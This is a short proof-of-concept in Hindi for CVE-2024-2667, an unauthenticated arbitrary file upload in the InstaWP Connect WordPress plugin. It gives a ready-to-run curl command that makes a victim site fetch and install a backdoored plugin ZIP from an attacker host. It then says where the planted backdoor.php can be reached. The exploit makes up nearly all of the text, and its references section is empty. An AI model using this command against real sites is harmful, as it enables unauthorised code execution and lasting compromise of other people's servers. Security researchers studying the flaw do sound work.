
यह CVE-2024-2667 के लिए POC है (InstaWP Connect – 1-क्लिक WP स्टेजिंग और माइग्रेशन <= 0.1.0.22 - अनधिकृत मनमाना फ़ाइल अपलोड)
curl --data "api_key=123&override_plugin_zip=http://attacker-domain/malicious-plugin.zip" "http://victim-domain/?rest_route=/instawp-connect/v1/config"
api_key -> आप कोई भी वैध या अमान्य API Key का उपयोग कर सकते हैं।
override_plugin_zip -> ज़िप फ़ाइल का पथ जिसमें एक बैकडोर के साथ दुर्भावनापूर्ण WordPress प्लगइन है।
एक बार आयात करने के बाद आप http://victim-domain/wp-content/plugins/malicious-plugin/backdoor.php पर बैकडोर तक पहुँच सकते हैं (यह मानते हुए कि निर्देशिका का नाम malicious-plugin है और backdoor.php उस निर्देशिका के अंतर्गत है)
संदर्भ: